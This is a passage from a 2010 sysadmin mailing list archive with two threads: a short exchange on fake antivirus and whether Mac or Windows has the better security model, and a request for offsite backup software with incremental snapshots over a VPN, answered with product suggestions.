relatively recently.  I mean, when you cannot even run Outlook without
elevated permissions, it becomes kind of pointless (based on Outlook
2003 not working as a regular user).

Bill Mayo

-Original Message-
From: Angus Scott-Fleming [mailto:angu...@geoapps.com] 
Sent: Wednesday, April 28, 2010 12:27 PM
To: NT System Admin Issues
Subject: Re: WTF? Fake AV

On 28 Apr 2010 at 11:00, Steven M. Caesare  wrote:

> > While I am not a huge fan of MACS, their security model is obviously
> > much better than Windows
>
> I'd suggest that's an ill-drawn conclusion.

+1.  Charlie Miller, the Pwn2Own champ three years running, hacks Macs
by choice over Windows because he says they're easier to hack.

--
Angus Scott-Fleming
GeoApps, Tucson, Arizona
1-520-290-5038
Security Blog: http://geoapps.com/








Re: backup software solution for offsite

2010-04-28 Thread justino garcia
I wish not to be hosted on a third-party cloud, but rather just host on our own
server at the data center.
And Mozy is good, but we want an image snapshot.

Thanks

On Wed, Apr 28, 2010 at 1:15 PM, Charlie Kaiser
wrote:

> Check out Mozy Pro (Mozy.com) or Amazon Web Services.
>
> ***
> Charlie Kaiser
> charl...@golden-eagle.org
> Kingman, AZ
> ***
>
> > -Original Message-
> > From: justino garcia [mailto:jgarciaitl...@gmail.com]
> > Sent: Wednesday, April 28, 2010 10:08 AM
> > To: NT System Admin Issues
> > Subject: backup software solution for offsite
> >
> > I have a need to set up offsite backups via an IPsec tunnel,
> > through SFTP, FTP or SMB.
> > Something we can take daily inc snapshots and send over the
> > internet using VPN, that has retention rules and alerts to
> > admin (me) if a backup fails.
> > Any commercial product, any ideas?
> >
> > Thanks
> >
> >
> > --
> > Justin
> > IT-TECH
> >
>
>
>



-- 
Justin
IT-TECH
